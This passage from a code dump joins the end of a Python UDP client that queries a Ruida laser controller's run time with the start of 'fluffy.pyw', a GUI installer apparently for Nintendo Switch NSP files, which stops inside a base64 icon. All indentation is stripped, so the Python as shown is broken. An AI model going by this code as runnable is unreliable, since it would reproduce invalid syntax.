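# One-shot usage sketch (not part of the original module; assumes a Ruida
# controller at the given address answering on UDP port 50200):
# comm = RuidaCommunicator("10.20.0.252")
# comm.send(RuidaCommand.GET_RUN_TIME)
# reply = comm.receive() # unswizzled payload bytes, or None on timeout/ACK/error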
def server(ruida: RuidaCommunicator, msg_received, cmd):
done = False
while True:
resp = ruida.receive()
if resp is None:
continue
received_cmd = resp[0:4] # the first four bytes echo the command that was sent
# Check which command we got a response for
if received_cmd[0] == int.from_bytes(MSGTypes.MSG_PROPERTY.value, "big"):
logger.info("Got property cmd")
# The response is for a command of the msg property type
if received_cmd[2:4] == CMDTypes.RUN_TIME.value:
logger.info("Got run time cmd")
runtime = ruida_bytes_to_unsigned(resp[-5:])
minutes, seconds = divmod(runtime, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
print(f"{cmd} -> {runtime} s ({days} days, {hours:2}h {minutes:2}m {seconds:2} s)")
done = True
# Are we done? If yes, set the shared flag and quit
if done:
logger.info("Done")
with msg_received.get_lock():
msg_received.value = True
break
def client(ruida: RuidaCommunicator, msg_received, cmd):
while True:
logger.info("Send cmd")
ruida.send(cmd)
time.sleep(60)
with msg_received.get_lock():
if msg_received.value:
break
if __name__ == "__main__":
ip = "10.20.0.252"
cmd = RuidaCommand.GET_RUN_TIME
logging.basicConfig(format="%(asctime)s - %(module)-8s %(levelname)5s: %(message)s", datefmt="%Y-%m-%d %H:%M:%S", level=logging.DEBUG)
ruida = RuidaCommunicator(ip)
msg_received = Value('i', False)
server_process = Process(target=server, args=(ruida, msg_received, cmd))
server_process.start()
client_process = Process(target=client, args=(ruida, msg_received, cmd))
client_process.start()
server_process.join()
client_process.join()
|
fluffy.pyw
|
#! /usr/bin/env python3
"""
"Pink Donut" design was designed by fourminute exclusively for
Fluffy and does not infringe on any copyright.
Copyright (c) 2019 fourminute (https://github.com/fourminute)
Fluffy is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Fluffy is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
"""
# Imports
import signal
import time
import socket
import base64
import os
import sys
import threading
import struct
import random
import re
import configparser
try:
import logging
if os.path.isfile('fluffy.log'):
os.remove('fluffy.log')
LOG_FILENAME = 'fluffy.log'
logging.basicConfig(filename=LOG_FILENAME, level=logging.DEBUG)
logging.debug("Fluffy Log: If you see nothing here, good!")
is_logging = True
except Exception:
is_logging = False
try:
from tkinter import filedialog
import tkinter as tk
root = tk.Tk()
root.withdraw()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
else:
print(str(e))
exit()
try:
from SimpleHTTPServer import SimpleHTTPRequestHandler
from SocketServer import TCPServer
from urllib import quote
except ImportError:
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import quote
try:
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt, QThread, QByteArray
from PyQt5.QtWidgets import *
from PyQt5.QtGui import QIcon, QPixmap, QColor, QImage
app = QtWidgets.QApplication(sys.argv)
window = QMainWindow()
except Exception as e:
if is_logging:
logging.error(e, exc_info=True)
else:
print(str(e))
exit()
try:
import usb.core
import usb.util
usb_success = True
except ImportError:
usb_success = False
# Variables
VERSION = "2.7.1"
GREEN = "QLabel {color: #09A603;}"
BLUE = "QLabel {color: #00A2FF;}"
RED = "QLabel {color: #cc2249;}"
PURPLE = "QLabel {color: #7F0CE8;}"
CMD_ID_EXIT = 0
CMD_ID_FILE_RANGE = 1
CMD_TYPE_RESPONSE = 1
iconpixmap = QPixmap()
inlaypixmap = QPixmap()
dinlaypixmap = QPixmap()
transfer_rate = 0
is_installing = False
last_error = "NA"
is_done = False
is_network = False
is_goldleaf = False
is_exiting = False
selected_dir = None
selected_files = None
sent_header = False
cur_nca_name = "NA"
start_time = time.time()
cur_transfer_rate = 0
last_transfer_rate = 0
cur_progress = 0
end_progress = 0
cur_nsp_count = 1
total_nsp = 0
cur_nsp_name = "NA"
max_nca_count = 0
cur_nca_count = 1
initial_dir = os.getcwd()
switch_ip = "0.0.0.0"
host_ip = "0.0.0.0"
language = 0
# Load Settings
if os.path.isfile(initial_dir + '/fluffy.conf'):
try:
with open(initial_dir + '/fluffy.conf') as cfgfile:
configp = configparser.ConfigParser()
configp.read_file(cfgfile)
switch_ip = configp.get('DEFAULT', 'switch_ip')
dark_mode = int(configp.get('DEFAULT', 'dark_mode'))
language = int(configp.get('DEFAULT', 'language'))
except Exception:
switch_ip = "0.0.0.0"
dark_mode = 0
language = 0
else:
switch_ip = "0.0.0.0"
dark_mode = 0
language = 0
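# Expected fluffy.conf layout (illustrative values; keys inferred from the
# reads above):
# [DEFAULT]
# switch_ip = 192.168.1.50
# dark_mode = 0
# language = 0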
gold_in = None
gold_out = None
net_port = 2000 # unused; kept for future reference (i.e. Goldleaf network mode)
ICON_DATA = b'AAABAAEAgIAAAAEAIAAoCAEAFgAAACgAAACAAAAAAAEAAAEAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAzfd4ANH7gBjR/4Ak1fuEJNH/gCDR+4Qg0f+EHNX/gBzV+4Ac1fuAGNX/hBjV/4AU0fuAFNX7gBDV/4AQ1fuADNH/gAzV/4AI1fuECNX7gATR+4AE0fuAAM3zbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHEqHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApZrcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5vyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnLLAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwdM8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIGAAACBgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADB20gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAIKGwAIGzcABxkzAAEDCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQADDB4AAwweAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMnfVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEEDQAGFi8ACyBAAAshQgALIUIABxk0AAEDCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBhQABxgzAAsgQAAKHz8AAw4hAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyedYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAwADDSEACRw5AAwhQgALIUMACyFDAAwhQgALIUIABxk0AAEDCwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgYABA8kAAoePAALIUIACyJCAAwhQgAKHz8AAw4iAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADF41wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFpHWARaR1wUYk9oLG5beIxuW3iMbl98/HJfgXhuX4F4bl99eG5f
fXhuX314bl99eG5ffXhuX314bl99dG5ffXRyX310bl99dHJjgRRqW3iIalt4iG5beDhaR1gQWkdUBAAAAAAAAAAAAAAAAAggYAAgaNgALIUEADCFDAAshQwALIUMADCFCAAwiQgALHz8AAw4iAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMnrXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAWktYBFpLXBhyX3yEclt9AHJffZhuV3qEbld65GpTc5BmU3OwYk9r6GJPa+heT2f0Wktj/FpLY/xeS2P8Xktj/F5LY/xeS2P8Xk9j+F5PY/heT2P4Xk9j+F5PY/heS1/4Yk9j8GJPZ+BiT2fgZlNvsGpXc4R2U3b0elN2gH5XeaR+U3kQelN0fHZPcCBaR1QEMIkMACyJDAAwiQwAMIkMADCJCAAwiQgAKHz8AAw4iAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyetgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF5LWAR2W3BMel95AHpjfchyW3bcaldznGJTa+BeT2f0Wktj/FpLX/xaS1/8Wktf/FpLX/xaS1/8Wktf/FpLX/xaS1/8Wktf/FpLX/xaS2P8Wktj/F5LY/xeT2P8Xk9j/F5PY/xeT2P8Xk9j/F5PY/xeS2P8Xktj/F5LY/xeS2P8Yktj/GJLY/xiS2P8Zktj+GpLZ+xqT2vUck9vkHpTeuh+U33Qfld9CH5XfFRaR1QEMIUIADCJCAAsiQwAKHz8AAw4iAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADJ62AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA